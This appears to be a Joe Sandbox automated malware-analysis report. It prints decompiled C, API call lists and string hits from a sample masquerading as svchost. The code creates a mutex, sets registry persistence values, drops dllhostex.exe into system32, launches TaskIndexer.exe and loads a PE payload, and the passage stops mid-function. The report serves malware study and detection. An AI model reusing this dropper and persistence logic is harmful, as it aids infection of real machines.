                                                • Opcode Fuzzy Hash: df00547ee7b2e4ad936eef959efeb4623ad668ff83ba6f5b551a865db5df0b6b
                                                • Instruction Fuzzy Hash: 92318F71611208ABEF20DFA9DC49BEEB7BCEB44650F1440B7E409EA150EF719E84CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 57%
                                                			E6FD549C0(void* __edi) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char _v32;
                                                				void _v932;
                                                				void* __esi;
                                                				signed int _t16;
                                                				void* _t19;
                                                				signed int _t21;
                                                				void* _t25;
                                                				char _t36;
                                                				void* _t46;
                                                				void* _t47;
                                                				void* _t49;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				void* _t53;
                                                
                                                				_t52 = (_t50 & 0xfffffff8) - 0x3a0;
                                                				_t16 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t16 ^ _t52;
                                                				asm("movaps xmm0, [0x6fd65fc0]");
                                                				asm("movups [esp+0x398], xmm0");
                                                				_v16 = 0x45463641;
                                                				_v12 = 0x7d4443;
                                                				_t19 = CreateMutexA(0, 1,  &_v32); // executed
                                                				_t46 = _t19;
                                                				_t21 = GetLastError() & 0xffffff00 | _t20 == 0x000000b7;
                                                				if(_t46 == 0) {
                                                					L3:
                                                					_pop(_t47);
                                                					return E6FD5599E(_v8 ^ _t52, _t47);
                                                				} else {
                                                					if(_t21 == 0) {
                                                						_t25 = memcpy( &_v932, "FunctionProtocolHost", 0xe0 << 2);
                                                						_t53 = _t52 + 0xc;
                                                						asm("o16 nop [eax+eax]");
                                                						do {
                                                							_t36 =  *((intOrPtr*)(_t53 + _t25 + 0xc8));
                                                							_t25 = _t25 + 1;
                                                							 *((char*)(_t25 + 0x6fd6b71f)) = _t36;
                                                						} while (_t36 != 0);
                                                						_push(0);
                                                						E6FD54160(_t36,  &_v932); // executed
                                                						_pop(_t49);
                                                						return E6FD5599E(_v8 ^ _t53 + 0x0000000c, _t49);
                                                					} else {
                                                						ReleaseMutex(_t46);
                                                						CloseHandle(_t46);
                                                						goto L3;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • CreateMutexA.KERNELBASE ref: 6FD54A0D
                                                • GetLastError.KERNEL32 ref: 6FD54A15
                                                • ReleaseMutex.KERNEL32(00000000), ref: 6FD54A2C
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD54A33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastRelease
                                                • String ID: A6FE$CD}$FunctionProtocolHost
                                                • API String ID: 733076996-4202578170
                                                • Opcode ID: 88844af2816a74fe4f3ea8bfa4d20f1e0e4a9b898b1a1a9fd6bd3a556a7a3685
                                                • Instruction ID: 7aaeb38f06cd7ea81db8e3b343f665841804c9154c4507ff748904a11b0a6f4d
                                                • Opcode Fuzzy Hash: 88844af2816a74fe4f3ea8bfa4d20f1e0e4a9b898b1a1a9fd6bd3a556a7a3685
                                                • Instruction Fuzzy Hash: DA2105315187849BDF618B249415BFF77ECEF87728F045969E88C8B280DB30726887A3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 89%
                                                			E6FD55590(void* __ebx, void* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v508;
                                                				void* _v512;
                                                				char _v516;
                                                				void* __esi;
                                                				signed int _t14;
                                                				void _t18;
                                                				void _t19;
                                                				void** _t21;
                                                				long _t24;
                                                				long _t28;
                                                				void* _t30;
                                                				signed int _t31;
                                                				signed int _t35;
                                                				void* _t44;
                                                				void* _t51;
                                                				void* _t52;
                                                				signed int _t53;
                                                
                                                				_t14 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t14 ^ _t53;
                                                				_v512 = 0;
                                                				_t30 = __ecx;
                                                				E6FD58E90( &_v508, "SYSTEM\\CurrentControlSet\\Services\\", 0x1f4);
                                                				_t51 = _t30;
                                                				do {
                                                					_t18 =  *_t30;
                                                					_t30 = _t30 + 1;
                                                				} while (_t18 != 0);
                                                				_t31 = _t30 - _t51;
                                                				_t44 =  &_v508 - 1;
                                                				do {
                                                					_t19 =  *(_t44 + 1);
                                                					_t44 = _t44 + 1;
                                                				} while (_t19 != 0);
                                                				_t35 = _t31 >> 2;
                                                				_t21 = memcpy(_t44, _t51, _t35 << 2);
                                                				memcpy(_t51 + _t35 + _t35, _t51, _t31 & 0x00000003);
                                                				_t24 = RegCreateKeyA(0x80000002,  &_v508, _t21); // executed
                                                				_pop(_t52);
                                                				if(_t24 == 0) {
                                                					_v516 = 0x120;
                                                					_t28 = RegSetValueExA(_v512, "Type", 0, 4,  &_v516, 4); // executed
                                                					SetLastError(_t28);
                                                				}
                                                				RegCloseKey(_v512);
                                                				return E6FD5599E(_v8 ^ _t53, _t52);
                                                			}

                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD555C3
                                                • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 6FD55609
                                                • RegSetValueExA.KERNELBASE(?,Type,00000000,00000004,?), ref: 6FD55638
                                                • SetLastError.KERNEL32(00000000), ref: 6FD5563F
                                                • RegCloseKey.ADVAPI32(?), ref: 6FD5564B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseCreateErrorLastValue_strncpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\$Type
                                                • API String ID: 803288783-1299366428
                                                • Opcode ID: 18cb19c89dc955b6750b95740b9316bc7d9f23a47e1589b64649eccfc301a35a
                                                • Instruction ID: 91ff7d8202ac33760edb5902ef728d25bb0700969f3ca7de5feb9f0254dda472
                                                • Opcode Fuzzy Hash: 18cb19c89dc955b6750b95740b9316bc7d9f23a47e1589b64649eccfc301a35a
                                                • Instruction Fuzzy Hash: 0F11E17454031AEBEF218F689C88BFAB778EF06318F4001E8E505A6141DB307A589BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996B3A
                                                • IsBadHugeReadPtr.KERNEL32(-FC63E248,000000F8), ref: 03996B69
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,039973C2,?,?,00000000,00000000), ref: 03996B8C
                                                Strings
                                                • Invalid payload: , xrefs: 03996BEC
                                                • Could not allocate memory in the current process, xrefs: 03996B98
                                                • Could not copy PE file, xrefs: 03996BC4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$AllocVirtual
                                                • String ID: Could not allocate memory in the current process$Could not copy PE file$Invalid payload:
                                                • API String ID: 328734856-732701330
                                                • Opcode ID: 2cbf35462c7b6a9d9c20017c99af6a0a6b6be52ba1971971e795b322abca6642
                                                • Instruction ID: 388d96eca3fe86b8c4b515f5cf3138ee165f9cdcbe3746dbe8b0220e90628be5
                                                • Opcode Fuzzy Hash: 2cbf35462c7b6a9d9c20017c99af6a0a6b6be52ba1971971e795b322abca6642
                                                • Instruction Fuzzy Hash: 3E21E6767087065BFE11E6ADEC41A6B739DEFC06B8B14007BE504CB241FB62E80186A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 03997E32
                                                • RegQueryValueExA.KERNELBASE(00000000,IPC,00000000,00000000,00000000,?), ref: 03997E64
                                                • RegQueryValueExA.KERNELBASE(00000000,IPC,00000000,00000000,00000000,00000000,?,?,73B76490), ref: 03997EA0
                                                • RegCloseKey.ADVAPI32(00000000,?,?,73B76490), ref: 03997EB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: IPC$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-2057897715
                                                • Opcode ID: c612c0e4873d2a0b49b10bca01ac6173cecc5b1c8215fa9f771cd8ff3bf55516
                                                • Instruction ID: 161c36f488c43f8702b293fcbcda29fae17505708d87b11d6a3c0fb549c3f600
                                                • Opcode Fuzzy Hash: c612c0e4873d2a0b49b10bca01ac6173cecc5b1c8215fa9f771cd8ff3bf55516
                                                • Instruction Fuzzy Hash: 1A114F75B4420CBFEF20DED5ED46FADB7BCEB40700F140095BC04E6291E771AA15AA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E6FD54160(char* _a8) {
                                                				void* _v8;
                                                				int _v12;
                                                				int _t10;
                                                				long _t12;
                                                
                                                				_v8 = 0;
                                                				_v12 = 1;
                                                				_t10 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12); // executed
                                                				if(_t10 != 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t12 = RegSetValueExA(_v8, "LastBackup", _t10, 3, _a8, 0x380); // executed
                                                					_push(_v8);
                                                					if(_t12 == 0) {
                                                						RegCloseKey();
                                                						return 1;
                                                					} else {
                                                						RegCloseKey();
                                                						goto L3;
                                                					}
                                                				}
                                                			}








                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,73B76490), ref: 6FD54193
                                                • RegSetValueExA.KERNELBASE(00000000,LastBackup,00000000,00000003,00000380,00000380), ref: 6FD541B0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 6FD541BD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 6FD541C9
                                                Strings
                                                • LastBackup, xrefs: 6FD541A8
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 6FD54189
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: LastBackup$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-3284959219
                                                • Opcode ID: 4297d587a6a3a3954bd7b1c46033f24c5f6733575c57588bbf4c28ad0d27124c
                                                • Instruction ID: 0615d26e5040502a8f3d5ba7deec95d3e6f3ca7d385b51510eb1913787bcd1bc
                                                • Opcode Fuzzy Hash: 4297d587a6a3a3954bd7b1c46033f24c5f6733575c57588bbf4c28ad0d27124c
                                                • Instruction Fuzzy Hash: CCF04931640208BBFF209BA0CD0AFA97BACAB05B15F100194BA04E9185DAB1BA24A665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: dllmain_crt_dispatchdllmain_raw
                                                • String ID:
                                                • API String ID: 1382799047-0
                                                • Opcode ID: 88ddd8615a635302d763df8f37c5a4af67e515094449471d617280c226cafcb1
                                                • Instruction ID: 42f81da08cc26b5a889d230c3ea5ea1703827568f0a2efd0cfc679126018924a
                                                • Opcode Fuzzy Hash: 88ddd8615a635302d763df8f37c5a4af67e515094449471d617280c226cafcb1
                                                • Instruction Fuzzy Hash: 0D213176D09325BBEF21EF6D8C8096F6A6DAFC7AA0B0D094FF9152B101C63585118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 03996F75
                                                • Sleep.KERNELBASE(000003E8,?,?,?,?,?,?,00000009,039BCAE8,00000000), ref: 039970AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySleepSystem
                                                • String ID: $%s\%s.exe$svchost
                                                • API String ID: 2556431487-1837889624
                                                • Opcode ID: 95fd5aafcdf33f4b5af0d08d940e10b42ebf29b346ea964f5ee1d3784e0e1382
                                                • Instruction ID: 77474b914f8bc02a178a92280fdc21add3be57041f00b2492e87a156f840db35
                                                • Opcode Fuzzy Hash: 95fd5aafcdf33f4b5af0d08d940e10b42ebf29b346ea964f5ee1d3784e0e1382
                                                • Instruction Fuzzy Hash: DA4150B5D40318ABEF20DB98DC89BDDB7B8EB44714F1002DAE519AB281DB745B84CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe,40000000,00000002,00000000,00000002,00000080,00000000,73B76490,00000000,00000001,00000000,?,03997C1E), ref: 03997889
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,03997C1E), ref: 0399789E
                                                • CloseHandle.KERNEL32(00000000,?,03997C1E), ref: 039978A9
                                                • CloseHandle.KERNEL32(00000000,?,03997C1E), ref: 039978BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: C:\Windows\system32\dllhostex.exe
                                                • API String ID: 3602564925-2014199763
                                                • Opcode ID: efe2d6015bd8339f1b77a77957746f139c0a7ccda7a32718bfb76921546d340d
                                                • Instruction ID: 2163ad3d98f175e6bf0aca0cd70bdf16081293fbf03f8b6eed9b412c7d1bd526
                                                • Opcode Fuzzy Hash: efe2d6015bd8339f1b77a77957746f139c0a7ccda7a32718bfb76921546d340d
                                                • Instruction Fuzzy Hash: 8B11293572D3447EFB24E26EAD4AFA73B9CDBC4244F04406AF9058E286EB719D0083A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • new.LIBCMT ref: 039913DC
                                                • GetStartupInfoA.KERNEL32(?), ref: 039913FD
                                                • CreateProcessA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,00000000,00000000,00000000,00000000,00000040,00000000,00000000,00000044,00000000,?,?,?,?,73B75870,00000000), ref: 0399142D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: C:\Windows\system32\TaskIndexer.exe$D
                                                • API String ID: 525363069-3853640166
                                                • Opcode ID: 6301b7f3f4afd57234a41420451a44cb94afe2dc1a2fae4e2e767947041b92c2
                                                • Instruction ID: bcf70f09291224c463ba794e9b2728f3a9e289355159fd9aed10f8c4346bcb27
                                                • Opcode Fuzzy Hash: 6301b7f3f4afd57234a41420451a44cb94afe2dc1a2fae4e2e767947041b92c2
                                                • Instruction Fuzzy Hash: 950184B1A403087AEB20DBE59D46F9E76AC9F45B00F200116B708FA1C0E6B5AD4046A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E6FD53FA0(intOrPtr __ecx, intOrPtr __edx) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t46;
                                                				void* _t49;
                                                				signed int _t51;
                                                				intOrPtr _t52;
                                                				intOrPtr _t56;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				long _t65;
                                                				intOrPtr _t68;
                                                				long _t70;
                                                				void* _t71;
                                                				intOrPtr _t72;
                                                				void* _t73;
                                                
                                                				_t68 = 0;
                                                				_v20 = __edx;
                                                				_t64 = __ecx;
                                                				_v12 = __ecx;
                                                				_t76 = __edx;
                                                				if(__edx <= 0) {
                                                					L11:
                                                					if( *0x6fd6ac98 <= 0) {
                                                						goto L13;
                                                					} else {
                                                						return 1;
                                                					}
                                                				} else {
                                                					while(1) {
                                                						_t56 = E6FD559AF(_t68, _t76, 0x58);
                                                						_v16 = _t56;
                                                						E6FD57920(_t64, _t56, 0, 0x58);
                                                						asm("movups xmm0, [esi+edi]");
                                                						asm("movups [ebx], xmm0");
                                                						asm("movups xmm0, [esi+edi+0x10]");
                                                						asm("movups [ebx+0x10], xmm0");
                                                						asm("movups xmm0, [esi+edi+0x20]");
                                                						asm("movups [ebx+0x20], xmm0");
                                                						asm("movups xmm0, [esi+edi+0x30]");
                                                						asm("movups [ebx+0x30], xmm0");
                                                						asm("movups xmm0, [esi+edi+0x40]");
                                                						_v8 = _t68 + 0x50;
                                                						asm("movups [ebx+0x40], xmm0");
                                                						_t70 =  *(_t56 + 0xc);
                                                						_t65 =  *(_t56 + 0x38);
                                                						 *((intOrPtr*)(_t56 + 0x50)) = LocalAlloc(0x40, _t70);
                                                						 *((intOrPtr*)(_t56 + 0x54)) = LocalAlloc(0x40, _t65);
                                                						E6FD5FDE0( *((intOrPtr*)(_t56 + 0x50)), _v8 + _v12, _t70);
                                                						_v8 = _v8 + _t70;
                                                						E6FD5FDE0( *((intOrPtr*)(_t56 + 0x54)), _v8 + _t70 + _v12, _t65);
                                                						_v8 = _v8 + _t65;
                                                						_t46 = LocalAlloc(0x40,  *(_t56 + 0xc) + 0x50);
                                                						asm("movups xmm0, [ebx]");
                                                						_t71 = _t46;
                                                						asm("movups [esi], xmm0");
                                                						_t19 = _t71 + 0x50; // 0x50
                                                						asm("movups xmm0, [ebx+0x10]");
                                                						asm("movups [esi+0x10], xmm0");
                                                						asm("movups xmm0, [ebx+0x20]");
                                                						asm("movups [esi+0x20], xmm0");
                                                						asm("movups xmm0, [ebx+0x30]");
                                                						asm("movups [esi+0x30], xmm0");
                                                						asm("movups xmm0, [ebx+0x40]");
                                                						asm("movups [esi+0x40], xmm0");
                                                						E6FD5FDE0(_t19,  *((intOrPtr*)(_t56 + 0x50)),  *(_t56 + 0xc));
                                                						_t49 = E6FD53DF0(_t71,  *(_t56 + 0xc) + 0x50,  *((intOrPtr*)(_t56 + 0x54)),  *(_t56 + 0x38)); // executed
                                                						_t73 = _t73 + 0x44;
                                                						LocalFree(_t71); // executed
                                                						if(_t49 == 0) {
                                                							break;
                                                						}
                                                						_t51 =  *0x6fd6ac9c; // 0x14
                                                						_t59 =  *0x6fd6ac98; // 0x14
                                                						if(_t51 > _t59) {
                                                							_t52 =  *0x6fd6ac94; // 0x304ebb8
                                                							goto L9;
                                                						} else {
                                                							_t72 =  *0x6fd6ac94; // 0x304ebb8
                                                							_push(0x28 + _t51 * 4);
                                                							_t52 = E6FD58E7B(_t59);
                                                							_t73 = _t73 + 4;
                                                							 *0x6fd6ac94 = _t52;
                                                							if(_t52 != 0) {
                                                								if(_t72 != 0) {
                                                									_t60 =  *0x6fd6ac9c; // 0x14
                                                									E6FD5FDE0(_t52, _t72, _t60 << 2);
                                                									L6FD58E76(_t72);
                                                									_t52 =  *0x6fd6ac94; // 0x304ebb8
                                                									_t73 = _t73 + 0x10;
                                                								}
                                                								 *0x6fd6ac9c =  *0x6fd6ac9c + 0xa;
                                                								_t59 =  *0x6fd6ac98; // 0x14
                                                								L9:
                                                								 *((intOrPtr*)(_t52 + _t59 * 4)) = _v16;
                                                								 *0x6fd6ac98 =  *0x6fd6ac98 + 1;
                                                							}
                                                						}
                                                						_t68 = _v8;
                                                						_t64 = _v12;
                                                						if(_t68 < _v20) {
                                                							continue;
                                                						} else {
                                                							goto L11;
                                                						}
                                                						goto L14;
                                                					}
                                                					L13:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				L14:
                                                			}























                                                APIs
                                                • new.LIBCMT ref: 6FD53FC2
                                                • LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD54013
                                                • LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5401F
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5405C
                                                  • Part of subcall function 6FD53DF0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E05
                                                • LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD540AC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$AcquireContextCryptFree
                                                • String ID:
                                                • API String ID: 966490891-0
                                                • Opcode ID: dea0d23dff8ec06d204dec1a73a5da738fb96a94733743da0b9103da62bd4185
                                                • Instruction ID: 384773e467cc5dafb7dcc4e35370beef1e0a46e36d66a498089afa5249fff2f3
                                                • Opcode Fuzzy Hash: dea0d23dff8ec06d204dec1a73a5da738fb96a94733743da0b9103da62bd4185
                                                • Instruction Fuzzy Hash: 3151C635D00B54EBEF418F68C941ABA7774FF56318F059249ED486B106EB31BAE4CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E6FD54330() {
                                                				intOrPtr* _t15;
                                                				void* _t17;
                                                				void* _t18;
                                                				signed int _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				intOrPtr _t27;
                                                				intOrPtr* _t31;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t47;
                                                
                                                				EnterCriticalSection(0x6fd6ac7c);
                                                				_t23 = 0;
                                                				_t34 =  *0x6fd6ac98 - _t23; // 0x14
                                                				if(_t34 <= 0) {
                                                					L21:
                                                					LeaveCriticalSection(0x6fd6ac7c);
                                                					return _t15;
                                                				} else {
                                                					do {
                                                						_t31 = 0;
                                                						_t35 = _t23 -  *0x6fd6ac98; // 0x14
                                                						if(_t35 < 0) {
                                                							_t33 =  *0x6fd6ac94; // 0x304ebb8
                                                							_t31 =  *((intOrPtr*)(_t33 + _t23 * 4));
                                                						}
                                                						_t27 =  *_t31;
                                                						if(_t27 == 0x153 || _t27 == 0x20e || _t27 == 0x213 || _t27 == 0x1a7 || _t27 == 0x1ac) {
                                                							_t24 =  *(_t31 + 0x50);
                                                							if(_t24 != 0) {
                                                								 *(_t31 + 8) = 0;
                                                								 *(_t31 + 0xc) = 0;
                                                								LocalFree(_t24);
                                                								_t15 = __imp__LocalFree; // 0x73b75870
                                                								 *(_t31 + 0x50) = 0;
                                                							}
                                                							_t25 =  *(_t31 + 0x54);
                                                							if(_t25 != 0) {
                                                								 *_t15(_t25);
                                                								 *(_t31 + 0x54) = 0;
                                                							}
                                                						}
                                                						if(_t27 == 0x1b2 || _t27 == 0x2e3) {
                                                							_t17 =  *(_t31 + 0x50);
                                                							if(_t17 != 0) {
                                                								 *(_t31 + 8) = 0;
                                                								 *(_t31 + 0xc) = 0;
                                                								LocalFree(_t17); // executed
                                                								 *(_t31 + 0x50) = 0;
                                                							}
                                                							_t18 =  *(_t31 + 0x54);
                                                							if(_t18 != 0) {
                                                								LocalFree(_t18);
                                                								 *(_t31 + 0x54) = 0;
                                                							}
                                                						}
                                                						_t15 = LocalFree;
                                                						_t23 = _t23 + 1;
                                                						_t47 = _t23 -  *0x6fd6ac98; // 0x14
                                                					} while (_t47 < 0);
                                                					goto L21;
                                                				}
                                                			}
















                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54336
                                                • LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543A4
                                                • LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543EF
                                                • LocalFree.KERNEL32(?,73B76490,?,?,6FD54933), ref: 6FD54400
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54422
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: FreeLocal$CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 2406571278-0
                                                • Opcode ID: 075f6523e18c8c0ce678730647888f341e0c227d040e92f895f59e8c1b685c81
                                                • Instruction ID: 6babcb44d7bf08d2eace5625177f0699ff644a46107e96dffb6d5ca20ff2df66
                                                • Opcode Fuzzy Hash: 075f6523e18c8c0ce678730647888f341e0c227d040e92f895f59e8c1b685c81
                                                • Instruction Fuzzy Hash: 8C21AF79A40B10CBFFA0AF54C4A4BAA73E4BF42724F05041DD49A87660C778B478CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E6FD55320() {
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr _t16;
                                                				intOrPtr _t25;
                                                				intOrPtr* _t27;
                                                				intOrPtr* _t34;
                                                				signed int _t35;
                                                
                                                				while(1) {
                                                					EnterCriticalSection(0x6fd6ac2c);
                                                					_t25 =  *0x6fd6ac48; // 0x0
                                                					_t35 = 0;
                                                					if(_t25 == 0) {
                                                						goto L10;
                                                					} else {
                                                						goto L2;
                                                					}
                                                					do {
                                                						L2:
                                                						_t34 = 0;
                                                						if(_t35 < _t25) {
                                                							_t16 =  *0x6fd6ac44; // 0x0
                                                							_t34 =  *((intOrPtr*)(_t16 + _t35 * 4));
                                                						}
                                                						if( *((intOrPtr*)(_t34 + 4)) > 0) {
                                                							if((0x10624dd3 * GetTickCount() >> 0x20 >> 6) -  *((intOrPtr*)(_t34 + 4)) >= 0xf) {
